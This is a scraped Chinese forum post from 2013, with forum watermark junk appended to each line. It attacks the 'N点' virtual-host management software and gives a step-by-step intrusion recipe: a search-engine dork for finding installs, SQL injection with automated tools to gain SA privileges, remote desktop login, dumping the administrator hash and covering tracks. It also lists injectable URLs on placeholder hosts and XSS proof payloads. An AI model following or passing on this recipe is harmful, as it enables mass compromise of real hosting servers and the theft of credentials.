不得不说N点实在是一个破东西, v ?, P j/ x+ Q& O$ h
就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂4 [& }( E1 I q2 O" j! g7 r
好吧 抱怨一下就行了 接下来关键的时候到了3 `" x$ l3 T2 d: H4 `3 o' V" j" l
首先百度搜索关键字:inurl: (mmdatabase.asp)* K- c" e: |8 I
我随便列举一个: www.xxxx.com4 {' `7 K5 G( ~. ?% b
修改链接:http://www.xxxx.com:80/Style/new ... &RID=1&ID=1
|. U' \4 y- o5 A1 v, D$ U8 c( Z3 N% q扔入NBSI 或者啊D等各种傻逼工具后9 j; G- R. O1 f3 L
你们会看到是SA权限0 _8 S; G& p3 Z
果断3389 上去 hash得到administrator密码3 o* R& H; ]/ a+ g+ Z
擦屁股走人~1 l8 N5 k0 w' ~* T/ ~
经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的
' R; A0 d3 Q4 x* h; T" O, F 8 t3 d7 k: j& l6 L
再附上其他几个漏洞页面, }% ~6 }4 i' b: X5 L' p0 l B" F
SQL:
3 P; z7 ^4 M6 D8 C, {http://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=1
5 ~$ ~2 A1 C* o& c- `/ |http://www.xxxxxx.com:80/Manage/ ... ogin.asp&PID=110 B$ R! f+ \" w$ K- J- f7 z$ q
http://www.xxxxxx.com:80/Manage/ ... login.asp&PID=95 V$ g. j% t5 a. `; @% O$ l
http://www.xxxxxx.com:80/Style/vhosting.asp?classID=2
, Q/ b! \0 u) l0 q4 q$ }8 BXSS证明:
9 y1 }* c* t- hhttp://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”0 f/ Q* S4 X) q6 A9 Z1 l
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”
. X3 ~, |# s% N. ghttp://www.xxxxxx.com:80/Style/d ... mp;checkbox2=.bj.cn<script>alert(42873)</script>
( o- B+ Q& _' s9 @: [由此可见点就是坑逼中的战斗机 自从用了他我的眼泪都流干了 有做IDC的朋友千万别步我后尘啊 便宜没好货好货不便宜
1 p) `! w+ O r- Y" s; d- b还是星外吧 你们懂的
; z+ U! E$ L* \5 v作为一个商用程序 安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?
6 U& D; F1 x& }! W5 ?PS:其实我真的很想知道你说N点这SB asp就asp吧 为什么asp还非要MSSQL 这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。 o(︶︿︶)o 唉% H2 P6 @7 `3 a
——- |
发表于 2013-3-3 08:06:44
收藏
支持
反对